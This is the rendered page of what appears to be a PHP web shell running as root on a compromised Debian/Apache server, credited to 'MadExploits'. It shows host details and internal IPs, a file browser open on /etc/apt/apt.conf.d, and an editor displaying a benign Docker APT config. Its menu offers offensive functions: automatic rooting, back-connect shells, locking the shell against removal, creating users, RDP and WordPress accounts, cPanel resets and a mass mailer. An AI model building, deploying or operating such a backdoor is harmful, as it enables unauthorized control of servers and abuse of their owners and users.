Linux e000727e84fa 5.4.0-208-generic #228-Ubuntu SMP Fri Feb 7 19:41:33 UTC 2025 x86_64
Apache/2.4.62 (Debian)
: 192.168.16.2 | : 192.168.16.1
Cant Read [ /etc/named.conf ]
8.2.27
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
apt /
apt.conf.d /
[ HOME SHELL ]
Name
Size
Permission
Action
01autoremove
399
B
-rw-r--r--
70debconf
182
B
-rw-r--r--
docker-autoremove-suggests
754
B
-rw-r--r--
docker-clean
1.15
KB
-rw-r--r--
docker-gzip-indexes
481
B
-rw-r--r--
docker-no-languages
269
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : docker-autoremove-suggests
# Since Docker users are looking for the smallest possible final images, the # following emerges as a very common pattern: # RUN apt-get update \ # && apt-get install -y <packages> \ # && <do some compilation work> \ # && apt-get purge -y --auto-remove <packages> # By default, APT will actually _keep_ packages installed via Recommends or # Depends if another package Suggests them, even and including if the package # that originally caused them to be installed is removed. Setting this to # "false" ensures that APT is appropriately aggressive about removing the # packages it added. # https://aptitude.alioth.debian.org/doc/en/ch02s05s05.html#configApt-AutoRemove-SuggestsImportant Apt::AutoRemove::SuggestsImportant "false";
Close